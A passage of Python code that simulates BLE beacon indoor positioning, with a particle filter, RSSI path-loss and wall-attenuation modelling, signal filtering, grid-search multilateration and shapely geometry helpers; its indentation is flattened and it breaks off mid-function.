walkingNoise=np.array( (walking_noise_x,walking_noise_y)).T
#walkingNoise=np.random.uniform(-movingLimit,movingLimit,size=(2,))
if self.prev_walkingNoise is not None:
walkingChoices=[walkingNoise,self.prev_walkingNoise]
walkingNoise = np.copy(walkingChoices[ np.random.choice([0,1], p=(1-prevMotionRepeatProb,prevMotionRepeatProb)) ] ) # choose the prev motion with a higher probability
tmpBeaconPos=self.beacon_pos + walkingNoise + movingTendency
#print "beacon pos is: " + str(self.beacon_pos)
#print "walkingNoise is: " + str(walkingNoise)
isCollision=not checkIfCoordinateIsInMap(tmpBeaconPos, OOIWidth,OOIHeight)
if not isCollision:
for blockPosition in blockPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
if checkEllipseRectangleIntersection(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength) or \
findRectangleLineSegmentIntersectionPoints(self.beacon_pos,tmpBeaconPos,blockPosition,blockWidth,blockLength) is not None :
isCollision=True
break
if not isCollision:
for roomIndex, roomPosition in enumerate(roomPositions):
#if checkCircleCollision_WithRectangle(tmpBeaconPos,beaconRadius,roomPosition,roomWidth,roomLength):
if checkEllipseRectangleIntersection(tmpBeaconPos,OOIWidth,OOIHeight,roomPosition,roomWidth,roomLength,boundaryForRect=roomBoundary) or \
findRectangleLineSegmentIntersectionPoints(self.beacon_pos,tmpBeaconPos,roomPosition,roomWidth,roomLength) is not None :
isCollision=True
break
if not isCollision:
break
self.prev_walkingNoise=np.copy(walkingNoise)
self.beacon_pos = np.copy(tmpBeaconPos)
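# Note: the loop above is effectively rejection sampling -- propose a bounded random step
# (repeating the previous step with probability prevMotionRepeatProb), and accept it only if the
# new position stays inside the map and the move neither overlaps nor crosses any block or room.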
def predict_BLE( self, no_of_noise_elements, movingLimit, pastCoeff, xdims, ydims, movingTendency=np.array([0,0]) ):
#rand_gaussian_noise=np.random.multivariate_normal(mu=mu,cov=sigma,size=no_of_noise_elements) # Draw random samples from a multivariate normal distribution
#rand_gaussian_noise = 0
xmin,xmax,ymin,ymax= xdims[0],xdims[1],ydims[0],ydims[1]
# ALL PARTICLES SHOULD RESIDE IN THE MAP, CHECK FOR BEING INSIDE FOR EACH PARTICLE (MOVE THAT AMOUNT AT THE BORDERS AT MAX)
# min of x, should not be lower than map's xmin && max of x should not be larger than map's xmax
# meaning low should be max(xmin,particles[:,0]-xmin-movingLimit) && high = min(xmax, xmax-particles[:,0]+movingLimit)
xlow = np.maximum(xmin,self.particles[:,0]-movingLimit)-self.particles[:,0]
xhigh =np.minimum(xmax, self.particles[:,0]+movingLimit)-self.particles[:,0]
ylow = np.maximum(ymin,self.particles[:,1]-movingLimit)-self.particles[:,1]
yhigh =np.minimum(ymax, self.particles[:,1]+movingLimit)-self.particles[:,1]
walking_noise_x = np.random.uniform(low=xlow,high=xhigh,size=self.particles.shape[0]) # human motion undeterminism
walking_noise_y = np.random.uniform(low=ylow,high=yhigh,size=self.particles.shape[0])
##print "walking_noise_x is: " + str(walking_noise_x)
#walking_noise = np.zeros(particles.shape)
walking_noise_x=np.array(walking_noise_x)
walking_noise_y=np.array(walking_noise_y)
walking_noise=np.array( (walking_noise_x,walking_noise_y)).T
if np.count_nonzero(self.x_prev) != 0 and np.count_nonzero(self.x_pp) != 0:
past_velocity = self.x_prev - self.x_pp
change_in_pos = (1-pastCoeff) * walking_noise + pastCoeff * past_velocity # constant_velocity_motion
else:
change_in_pos = walking_noise
#particles +=
self.particles += change_in_pos + movingTendency
# Update the weight of the particles according to the measured beacon position found in the multilateration algorithm for the current time step
def update_weights(self):
distances = np.linalg.norm(self.particles - self.averaged_beacon_pos, axis=1)
self.weights *= np.sum(distances)/distances
# SET ALL WEIGHTS INTERSECTING WITH AN OBSTRUCTION TO ZERO (so that particles do not accumulate on obstructions)
for particleIndex, particle in enumerate(self.particles):
isCollision=False
for blockPosition in blockPositions:
#if checkCircleCollision_WithRectangle(tmpBeaconPos,OOIWidth,OOIHeight,blockPosition,blockWidth,blockLength):
if checkEllipseRectangleIntersection(particle,particleWidth,particleHeight,blockPosition,blockWidth,blockLength):
isCollision=True
break
if not isCollision:
for roomIndex,roomPosition in enumerate(roomPositions):
#if checkCircleCollision_WithRectangle(tmpBeaconPos,beaconRadius,roomPosition,roomWidth[roomIndex],roomLength[roomIndex]):
#print "room wall width is: " + str(roomWallWidth)
# use roomWallWidth/2, since linewidth expands toward outside and inside (for roomWallWidth, expands roomWallWidth/2 towards inside and roomWallWidth/2 towards outside)
if checkEllipseRectangleIntersection(particle,particleWidth,particleHeight,roomPosition,roomWidth,roomLength,boundaryForRect=roomWallWidth/2): # roomWidth/roomLength/roomWallWidth are scalars in this script
isCollision=True
break
if isCollision:
self.weights[particleIndex]=0
self.weights += 10**(-300) # avoid round-off to zero
self.weights /= sum(self.weights) # normalize
# Resampling step (typically triggered when N_eff, the effective sample size, drops too low)
def resample_from_higher_weights(self,tmp_particles, tmp_weights):
#indices = multinomial_resample(weights)
#indices = residual_resample(weights)
#indices = stratified_resample(weights)
indices = systematic_resample(self.weights)
tmp_particles[:] = tmp_particles[indices]
tmp_weights[:] = tmp_weights[indices]
tmp_weights.fill(1.0 / len(tmp_weights))
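# systematic_resample draws N evenly spaced pointers over the cumulative weights, so particles
# are duplicated roughly in proportion to their weight; the caller presumably triggers this only
# when neff(self.weights) falls below a threshold (commonly N/2), the usual guard against
# resampling too often.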
# maxSignalError in dBm
# it checks line-segment/rectangle intersections to lower the signal if the receiver and the beacon are not in line of sight
def calc_RSSIs_to_Receivers(self,minSignalValue,minUsefulSignal,maxSignalError):
self.RSSIofReceivers[:] = []
self.UnprocessedRSSIofReceivers[:] = []
receiverIndex=0
for receiverPosition in self.receiverPositions:
res_unprocessedRSSI = 0
if(maxSignalError > 0):
res_unprocessedRSSI=weakenedSignal( distance_to_RSSI( np.linalg.norm(receiverPosition-self.beacon_pos) ) , maxSignalError )
else:
##print "the norm is: " + str(np.linalg.norm(receiverPosition-self.beacon_pos ))
res_unprocessedRSSI=distance_to_RSSI( np.linalg.norm(receiverPosition-self.beacon_pos ) )
#return max(-100,unprocessedRSSI) # Generally signals lower than -100 are not that reliable
isCollision=False
# this is used to weaken the signal in case there was a block or room between the receiver and the beacon(this is real calculation)
# this simulates the signal before we catch it in real life.
weakeningAmount=0 # distance between the receiver and the beacon / 1 meter * ( how many dBm to reduce for 1 meter)
for blockIndex, blockPosition in enumerate(blockPositions):
receiverBeaconBlockIntersection=findRectangleLineSegmentIntersectionPoints(receiverPosition,self.beacon_pos,blockPosition,blockWidth,blockLength)
if receiverBeaconBlockIntersection is not None:
#print "receiverBeaconBlockIntersection" + str(receiverBeaconBlockIntersection)
isCollision=True
weakeningAmount+=np.linalg.norm(receiverBeaconBlockIntersection[0,:]-receiverBeaconBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ] * np.random.uniform(0.5,1.5) # +- some noise olsun
# adding some noise per obstacle is also appropriate for real life
# actually the wall's material should also be taken into account here; the coefficients were defined per 1 meter
# so it should be distance/1m * coefficient, i.e. distance (in meters) * coefficient
for roomIndex, roomPosition in enumerate(roomPositions):
receiverBeaconRoomIntersection=findRectangleLineSegmentIntersectionPoints(receiverPosition,self.beacon_pos,roomPosition,roomWidth,roomLength)
if receiverBeaconRoomIntersection is not None:
#print "receiverBeaconRoomIntersection" + str(receiverBeaconRoomIntersection)
isCollision=True
weakeningAmount+=np.linalg.norm(receiverBeaconRoomIntersection[0,:]-receiverBeaconRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ] * np.random.uniform(0.5,1.5)
# * some coefficient (so the signal is not weakened too much inside a room); attenuating by the room's walls only is enough, which is roughly 1/8 of the room (considering the 2 walls we cross)
strengtheningAmount=0 # (distance between the receiver and the mean of the particles) / 1 meter * ( how many dBm to reduce for 1 meter)
# the calculations below are not real. They are our prediction by looking at the mean value of the particles
# if the mean of the prev calculations and the beacons have a block or room in between, we better increase the signal
# this simulates after receiving the signal in real life (post processing of the signal)
isMeanReceiverCollision=False # this is used to strengthen the received signal in case there was a block in between previously
if self.mu is not None: # do not compare with '!=' here, because it is ambiguous when mu is a numpy array
for blockIndex, blockPosition in enumerate(blockPositions):
receiverMeanBlockIntersection = findRectangleLineSegmentIntersectionPoints(receiverPosition,self.mu,blockPosition,blockWidth,blockLength)
if receiverMeanBlockIntersection is not None:
#print "receiverMeanBlockIntersection" + str(receiverMeanBlockIntersection)
isMeanReceiverCollision=True
strengtheningAmount+=np.linalg.norm(receiverMeanBlockIntersection[0,:]-receiverMeanBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ]
for roomIndex, roomPosition in enumerate(roomPositions):
receiverMeanRoomIntersection = findRectangleLineSegmentIntersectionPoints(receiverPosition,self.mu,roomPosition,roomWidth,roomLength)
if receiverMeanRoomIntersection is not None:
#print "receiverMeanRoomIntersection" + str(receiverMeanRoomIntersection)
isMeanReceiverCollision=True
strengtheningAmount+=np.linalg.norm(receiverMeanRoomIntersection[0,:]-receiverMeanRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ]
if isCollision:
##print "No Line Of Sight between receiver " + str(receiverPosition) + " and beacon " + str(self.beacon_pos)
#res_unprocessedRSSI=( weakenedSignal(res_unprocessedRSSI,maxSignalError) + res_unprocessedRSSI ) / 2.0 #weaken a bit, but not weaken upto max signal error
res_unprocessedRSSI-=weakeningAmount
else:
pass
##print "Direct Line Of Sight between receiver " + str(receiverPosition) + " and beacon " + str(self.beacon_pos)
res_processedRSSI=res_unprocessedRSSI
if isMeanReceiverCollision:
res_processedRSSI+=strengtheningAmount
##print "increased signal strength since there was a wall between the receiver and the beacon in the previous step according to our particle calculations"
# ONE MORE CHECK FOR SLIDING WINDOWS #
# each receiver should have a sliding window
# max slidingWindows size should be 7
slidingWindow = self.slidingWindows[receiverIndex]
while len(slidingWindow) >=7:
##print "prev size of the window is: " + str( len(self.slidingWindows) )
slidingWindow.popleft() # delete oldest element
##print "after size of the window is: " + str( len(self.slidingWindows) )
slidingWindow.append(res_processedRSSI) # appends at the right
##print "final size of the window is: " + str( len(self.slidingWindows) )
if self.filterAndCheckSignal(minUsefulSignal,receiverIndex) and res_processedRSSI > minSignalValue:
##print "filtering was successful"
self.RSSIofReceivers.append( res_processedRSSI )
self.UnprocessedRSSIofReceivers.append( res_unprocessedRSSI )
else:
##print "filtering was not successful"
self.RSSIofReceivers.append( None )
self.UnprocessedRSSIofReceivers.append( None )
receiverIndex+=1
def filterAndCheckSignal(self,minUsefulSignal,receiverIndex):
mean=0.0
sum=0.0
slidingWindow = self.slidingWindows[receiverIndex]
if len(slidingWindow) < 3:
return False
else:
noOutlierDeque=col_deque(sorted(slidingWindow) )
noOutlierDeque.popleft() # delete smallest
noOutlierDeque.pop() # delete greatest
for signalVal in noOutlierDeque:
sum+=signalVal
mean=sum/len(noOutlierDeque)
return mean >= minUsefulSignal
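# Worked example of the trimmed-mean filter above: with a window of [-92, -70, -75, -88, -71] dBm
# the sorted copy is [-92, -88, -75, -71, -70]; dropping the smallest (-92) and largest (-70)
# leaves [-88, -75, -71], whose mean is -78 dBm, which passes a minUsefulSignal of -90 dBm.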
# if RSSI is lower than -90dBm , then omit this receiver ( assuming we use 0dBm signal powered beacons)
def setBeaconDistances_fromRSSIs(self,minUsefulSignal):
self.distToReceivers[:] = []
for RSSIofReceiver in self.RSSIofReceivers:
#print "rssi of receiver is: " + str(RSSIofReceiver)
if RSSIofReceiver is not None and \
RSSIofReceiver > minUsefulSignal:
self.distToReceivers.append( RSSI_to_distance( RSSIofReceiver ) + safetyOffset ) # add safetyOffset to avoid divide by zero in the custom_minimize function
else:
self.distToReceivers.append( None )
# NumberOfParticles for 4 RECEIVER
def multiLateration(self,xdims,ydims,sensitivityOfResult):
receiverPositionsArray=np.array(self.receiverPositions)
# if checkForBlocks == True, the minimization also considers blocks, at the cost of extra computation time
# checkForBlocks means the None (no usable signal) information is also used in the multilateration calculation
resultingPoint = custom_minimize(self.RSSIofReceivers,np.vstack(receiverPositionsArray ),xdims,ydims,sensitivityOfResult,checkForBlocks=True )
return resultingPoint
def calc_PDF(self,strongSignalDistance,pastCoeff):
numberOfNotNones=0
numberOfStrongSignals=0
confidenceEllipseMultiplier=1
for distToReceiver in self.distToReceivers:
if distToReceiver is not None:
numberOfNotNones+=1
#print "dist to receiver is: " + str(distToReceiver)
if distToReceiver < strongSignalDistance:
numberOfStrongSignals+=1
"""returns mu and variance of the weighted particles"""
self.mu = np.average(self.particles, weights=self.weights, axis=0)
#var = np.average((particles - mu)**2, weights=weights, axis=0)
self.covMatrix = np.cov(m=self.particles, rowvar=False, aweights=self.weights) # rowvar has to be False otherwise each row represents a variable, with observations in the columns.
# https://docs.scipy.org/doc/numpy-1.15.0/reference/generated/numpy.cov.html
self.max_weighted_particle = self.particles[np.argmax(self.weights) ]
if numberOfNotNones >=3:
if numberOfStrongSignals >= 3:
confidenceEllipseMultiplier=1 # No change
elif numberOfStrongSignals == 2:
confidenceEllipseMultiplier=1.25
elif numberOfStrongSignals == 1:
confidenceEllipseMultiplier=1.5
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=2
# x1.6 worse than the >=3 case
elif numberOfNotNones == 2:
if numberOfStrongSignals == 2:
confidenceEllipseMultiplier=2
elif numberOfStrongSignals == 1:
confidenceEllipseMultiplier=2.4
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=3.2
# x3 worse than the >=3 case
elif numberOfNotNones == 1:
if numberOfStrongSignals == 1:
confidenceEllipseMultiplier=4.5
else: # numberOfStrongSignals == 0
confidenceEllipseMultiplier=6.0
# x5 worse than the >=3 case
else: # numberOfNotNones == 0:
#confidenceEllipseMultiplier=float("inf") # boyle olunca hic cizmesin ellipse
confidenceEllipseMultiplier=10.0 # 10.0 max'imiz olsun mesela
self.covMatrix*=confidenceEllipseMultiplier
# if pastCoeff == 1, then after the first round covMatrix would always equal the previous one, i.e. the covariance found in the first round would remain the estimate forever
if self.prevCovMatrix is not None:
self.covMatrix=self.covMatrix*(1-pastCoeff) + pastCoeff*self.prevCovMatrix
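# In short: calc_PDF scales the particle covariance by a confidence multiplier that grows as
# fewer/weaker receiver signals are available, then blends it with the previous covariance as
# cov = (1 - pastCoeff) * cov_new + pastCoeff * cov_prev; with pastCoeff = 0.2 that is 80% current
# estimate and 20% previous estimate (prevCovMatrix is presumably updated by the caller, e.g. in
# animate()).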
# ellipse center, ellipse width/height, and the 2 ends of the line segment
def findEllipseLineSegmentIntersectionPoints(ellipseCenter,width,height, p1,p2):
if ( np.array_equal(p1,p2) ):
return None
centerPoint = Point(ellipseCenter)
unitCircle = centerPoint.buffer(1).boundary
ellipse=shapely.affinity.scale(unitCircle,width,height)
line = LineString([p1,p2])
if ellipse.intersects(line):
intersectionPointObject = ellipse.intersection(line)
intersectionPoint=np.array([intersectionPointObject.coords[0],intersectionPointObject.coords[1]])
else:
intersectionPoint=None
return intersectionPoint
def checkFirstRectangleContainsSecondRectangle(rectCenter,rectWidth,rectLength, rectCenter2,rectWidth2,rectLength2,boundaryForFirstRect=0,boundaryForSecondRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect),-(rectLength/2 + boundaryForFirstRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect) ,rectLength/2 + boundaryForFirstRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,-(rectLength/2 + boundaryForFirstRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,rectLength/2 + boundaryForFirstRect])
bottomLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect),-(rectLength2/2 + boundaryForSecondRect) ])
topLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect) ,rectLength2/2 + boundaryForSecondRect])
bottomRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,-(rectLength2/2 + boundaryForSecondRect) ])
topRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,rectLength2/2 + boundaryForSecondRect])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
rectangle2 = Polygon([bottomLeftCorner2, topLeftCorner2, topRightCorner2, bottomRightCorner2])
return rectangle.contains(rectangle2)
def checkRectangleRectangleIntersection(rectCenter,rectWidth,rectLength, rectCenter2,rectWidth2,rectLength2,boundaryForFirstRect=0,boundaryForSecondRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect),-(rectLength/2 + boundaryForFirstRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForFirstRect) ,rectLength/2 + boundaryForFirstRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,-(rectLength/2 + boundaryForFirstRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForFirstRect,rectLength/2 + boundaryForFirstRect])
bottomLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect),-(rectLength2/2 + boundaryForSecondRect) ])
topLeftCorner2=rectCenter2+np.array([-(rectWidth2/2 + boundaryForSecondRect) ,rectLength2/2 + boundaryForSecondRect])
bottomRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,-(rectLength2/2 + boundaryForSecondRect) ])
topRightCorner2=rectCenter2+np.array([rectWidth2/2 + boundaryForSecondRect,rectLength2/2 + boundaryForSecondRect])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
rectangle2 = Polygon([bottomLeftCorner2, topLeftCorner2, topRightCorner2, bottomRightCorner2])
return rectangle.intersects(rectangle2)
# ellipse center, ellipse width/height, and the rectangle's center/width/length
def checkEllipseRectangleIntersection(ellipseCenter,width,height, rectCenter,rectWidth,rectLength,boundaryForRect=0):
# CORNERS
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
centerPoint = Point(ellipseCenter)
unitCircle = centerPoint.buffer(1).boundary
ellipse=shapely.affinity.scale(unitCircle,width,height)
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
return ellipse.intersects(rectangle)
def checkPointInsideRectangle(point,rectCenter,rectWidth,rectLength,boundaryForRect=0):
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
point = Point(point)
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
return point.intersects(rectangle)
def findRectangleLineSegmentIntersectionPoints(p1,p2,rectCenter,rectWidth,rectLength,boundaryForRect=0):
# CORNERS
if np.array_equal(p1,p2):
return None
bottomLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect),-(rectLength/2 + boundaryForRect) ])
topLeftCorner=rectCenter+np.array([-(rectWidth/2 + boundaryForRect) ,rectLength/2 + boundaryForRect])
bottomRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,-(rectLength/2 + boundaryForRect) ])
topRightCorner=rectCenter+np.array([rectWidth/2 + boundaryForRect,rectLength/2 + boundaryForRect])
line = LineString([p1,p2])
rectangle = Polygon([bottomLeftCorner, topLeftCorner, topRightCorner, bottomRightCorner])
#print "findRectangleLineSegmentIntersectionPoints"
if rectangle.intersects(line):
intersectionPointObject = rectangle.intersection(line)
#print intersectionPointObject.coords[0]
#print intersectionPointObject.coords[1]
#print np.array(intersectionPointObject.coords).shape
if np.array_equal(np.array(intersectionPointObject.coords).shape,np.array([2, 2])):
intersectionPoint=np.array([intersectionPointObject.coords[0],intersectionPointObject.coords[1]])
else:
intersectionPoint=None
#print "rectangle line intersection is: " + str(intersectionPoint)
#intersectionPoint=np.asarray(intersectionResult.geoms[0].coords[0],intersectionResult.geoms[1].coords[0])
else:
intersectionPoint=None
return intersectionPoint
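# Note: the (2, 2) shape check above means an intersection is only reported when the clipped
# segment inside the rectangle has exactly two coordinates; touching a single corner, or a
# degenerate segment (p1 == p2), yields None, so zero-length crossings never add attenuation.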
def generateRandomMACID():
return ':'.join('%02x'%np.random.randint(0,256) for _ in range(6))
# if a signal arriving at a receiver is still strong despite attenuation, it is more valuable than the other, weaker signals
# for this reason a signal whose distToReceivers value is small carries more information for us
# since we want that value to be small, multiplying by it makes the sum smaller and increases the chance of picking the point we want
# if the [x,y] point checked for multilateration differs from the BLE fingerprinting result by more than +-2dBm, penalize it, since such points are less likely
def custom_minimize(RSSIofReceivers, receiverPositions,xdims,ydims,sensitivityOfResult=1.0,checkForBlocks=True):
mysum=float("inf")
maxCatchableSignalDistance = RSSI_to_distance( minUsefulSignal ) + safetyOffset
#print "maxCatchableSignalDistance is: " + str(maxCatchableSignalDistance)
resultingPoint=[-1,-1]
for x in np.arange(xdims[0],xdims[1],sensitivityOfResult):
for y in np.arange(ydims[0],ydims[1],sensitivityOfResult):
# if x,y collides with a block or room, this position would not be possible
isPointOnObstacle=False
for blockPosition in blockPositions: # it will not enter this loop if there are no blocks
if checkPointInsideRectangle([x,y],blockPosition,blockWidth,blockLength):
isPointOnObstacle=True
break
if not isPointOnObstacle:
for roomIndex,roomPosition in enumerate(roomPositions):
if checkPointInsideRectangle([x,y],roomPosition,roomWidth,roomLength):
isPointOnObstacle=True
break
if isPointOnObstacle:
continue # this point cannot be what we are looking for
tmp_sum=0
for i in range(len(receiverPositions)):
strengtheningAmount=0
for blockIndex, blockPosition in enumerate(blockPositions): # it will not enter this loop if there are no blocks
receiverMeanBlockIntersection = findRectangleLineSegmentIntersectionPoints(receiverPositions[i],np.array([x,y]),blockPosition,blockWidth,blockLength)
if receiverMeanBlockIntersection is not None:
#print "receiverMeanBlockIntersection" + str(receiverMeanBlockIntersection)
strengtheningAmount+=np.linalg.norm(receiverMeanBlockIntersection[0,:]-receiverMeanBlockIntersection[1,:]) * material_SignalDisturbance_Coefficients[ blockMaterials[blockIndex] ]
for roomIndex, roomPosition in enumerate(roomPositions):
# when trying all possible x and y, this x and y should not be equal to a receiver's position, since that would not form a line
# if it is equal to the receiver's position, the intersection should return None
# so findRectangleLineSegmentIntersectionPoints should return None if the two points defining the line are equal
# also, if the intersection is at a corner (i.e. only 1 intersection point), it should return None as well, since the intersection distance would already be zero
receiverMeanRoomIntersection = findRectangleLineSegmentIntersectionPoints(receiverPositions[i],np.array([x,y]),roomPosition,roomWidth,roomLength)
if receiverMeanRoomIntersection is not None:
#print "receiverMeanRoomIntersection" + str(receiverMeanRoomIntersection)
strengtheningAmount+=np.linalg.norm(receiverMeanRoomIntersection[0,:]-receiverMeanRoomIntersection[1,:]) * WallRoomRatio * material_SignalDisturbance_Coefficients[ roomMaterials[roomIndex] ]
xyDistToRec = np.linalg.norm( [x,y] - receiverPositions[i] )
if RSSIofReceivers[i] is not None:
distToReceiverGivenRSSI=RSSI_to_distance( RSSIofReceivers[i] + strengtheningAmount) + safetyOffset
tmp_sum+=( abs( xyDistToRec - distToReceiverGivenRSSI ) / distToReceiverGivenRSSI ) ** 2
# only do this if the signal has been None for e.g. 5 consecutive rounds, not the moment it becomes None -> the signals are already filtered accordingly before being passed here
else: # if distToReceivers[i] is None, then [x,y] cannot plausibly be closer to this receiver than a certain distance (penalize it if it is closer)
# the closer [x,y] is to receiverPositions[i], the more it is penalized
# distToReceivers[i] is only our own estimate anyway; we could instead use e.g. 10m and measure how much it deviates from that
# but for us closer is worse, because we expect at least a certain distance, so use 1/([x,y]-receiverPositions) instead of 1/distToReceivers
#if checkForBlocks:
maxCatchableSignalDistance = RSSI_to_distance( minUsefulSignal + strengtheningAmount) + safetyOffset
if xyDistToRec < maxCatchableSignalDistance: # we see it as None, so it should not be closer than maxCatchableSignalDistance. If so, then punish
tmp_sum+=( abs( xyDistToRec - maxCatchableSignalDistance ) / xyDistToRec ) ** 2
if tmp_sum < mysum:
mysum = tmp_sum
resultingPoint=[x,y]
return resultingPoint
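# The cost minimized above, roughly: for each grid point p and receiver r_i with a usable RSSI,
# d_i = RSSI_to_distance(RSSI_i + attenuation of the materials crossed on the p--r_i segment) and
# the term ((|p - r_i| - d_i) / d_i)**2 is added; for receivers that heard nothing, p is only
# penalized if it lies closer to r_i than the maximum distance at which a signal would still
# have been catchable.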
# after the signal is transmitted it may hit a wall and be reduced in strength
# since we cannot manipulate the signal after transmission is done, we weaken it at transmission time, assuming it may hit something with some probability
# later we have to strengthen it again with some probability
def weakenedSignal(RSSI,maxSignalError):
return RSSI - uniform(0,maxSignalError)
def create_uniform_particles(x_range, y_range, NumberOfParticles):
particles = np.empty((NumberOfParticles, 2))
particles[:, 0] = uniform(x_range[0], x_range[1], size=NumberOfParticles)
particles[:, 1] = uniform(y_range[0], y_range[1], size=NumberOfParticles)
return particles
# for each receiver hold a separate signal strength map
# each beacon should have its interpolation all around the map; then we should take a weighted average of these beacons' signal strength values
# for example, FOR RECEIVER 1, if beacon1 is at [5,5], beacon2 is at [10,3] and the point that we want to interpolate is at [10,5], beacon2 should have the higher vote in determining the signal strength
# signal strength values of the beacons (fingerprint positions) are different for each receiver, therefore we hold a separate map for each receiver
def interpolateFingerPrintingResult():
xElems=np.arange(xdims[0],xdims[1],sensitivityOfResult)
yElems=np.arange(ydims[0],ydims[1],sensitivityOfResult )
allPosDistancesToReceivers={} # make it a dictionary where the key is 2d position
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
allPosDistancesToReceivers[i,x,y]=np.linalg.norm(receiverPositions[i]- [x,y])
numberOfBeacons=fingerPrintingSignalStrengthBeaconsToReceivers.shape[1]
allPosDistancesToBeacons={} # make it a dictionary where the key is 2d position
for k in range(numberOfBeacons):
for x in xElems:
for y in yElems:
allPosDistancesToBeacons[k,x,y]=np.linalg.norm(fingerPrintingBeaconPositions[k]- [x,y])
# INITIALIZE INTERPOLATION MAP FOR EACH RECEIVER
global interpolatedSignalStrenghForAllPositions_forEachReceiver
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y]=0
for i in range(numberOfReceivers):
for x in xElems:
for y in yElems:
minDist=float('inf')
min_k=0
# find the closest beacon to [x,y]
for k in range(numberOfBeacons):
if allPosDistancesToBeacons[k,x,y] < minDist:
min_k=k
minDist = allPosDistancesToBeacons[k,x,y]
base_dist=np.linalg.norm(fingerPrintingBeaconPositions[min_k]-receiverPositions[i])
target_dist=allPosDistancesToReceivers[i,x,y]
base_RSSI=fingerPrintingSignalStrengthBeaconsToReceivers[i][min_k]
# whichever beacon or receiver is the closest to [x,y], it should determine the interpolation result
interpolatedSignalStrenghForAllPositions_forEachReceiver[i,x,y]+=calc_relative_RSSI(base_dist,target_dist,base_RSSI)
print calc_relative_RSSI(base_dist,target_dist,base_RSSI)
print interpolatedSignalStrenghForAllPositions_forEachReceiver
def calc_relative_RSSI(base_dist, target_dist, base_RSSI):
if target_dist >= 1:
return base_RSSI - 20 * np.log10( target_dist / (base_dist+safetyOffset) ) # log10, to stay consistent with distance_to_RSSI (path-loss exponent 2)
else:
return zero_one_meter_distance_to_RSSI(target_dist)
#distance in meters, returns RSSI in dBm
# assuming the signal propagation constant is 2, https://www.rn.inf.tu-dresden.de/dargie/papers/icwcuca.pdf equation (4)
# above one meter: going from 4 m to 8 m moves log10(d) from about 0.6 to 0.9 (multiplied by a negative constant), so the output decreases more and more slowly as distance grows
# in zero_one_meter_distance_to_RSSI, by contrast, going from 0.1 m to 0.2 m moves the scaling factor from about 0.14 to 0.26, i.e. RSSI falls off faster below one meter (a round-trip check follows zero_one_meter_distance_to_RSSI below)
def distance_to_RSSI(distance):
res_RSSI = 0
##print "distance is: " + str(distance)
if distance >=1:
res_RSSI = -20 * np.log10(distance) + rssiAtOne
else:
res_RSSI = zero_one_meter_distance_to_RSSI(distance)
return float(res_RSSI)
#RSSI in dBm, returns distance in meter
def RSSI_to_distance(RSSI):
res_distance = 0
if RSSI <= rssiAtOne:
res_distance = 10**( (RSSI-rssiAtOne) / -20 )
else:
res_distance = zero_one_meter_RSSI_to_distance(RSSI)
return float(res_distance)
# EXPONENTIAL FUNCTION BETWEEN 0 and 1 METERS
def zero_one_meter_RSSI_to_distance(RSSI):
return 10**( ( ( RSSI - TX_Power ) * np.log10(2) ) / (rssiAtOne - TX_Power) ) -1
# should return something between TX power and rssiAtOne
def zero_one_meter_distance_to_RSSI (dist):
return float( TX_Power + (rssiAtOne - TX_Power) * ( (np.log10(dist+1)) / (np.log10(2) ) ) )
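# Small round-trip check of the model above (assuming TX_Power > rssiAtOne, as for a typical
# BLE beacon): above one meter RSSI follows -20*log10(d) + rssiAtOne, below one meter the
# exponential branch falls off faster, and RSSI_to_distance inverts both branches.
def _rssi_model_round_trip_demo():
    for d in (0.2, 0.5, 1.0, 4.0, 8.0):
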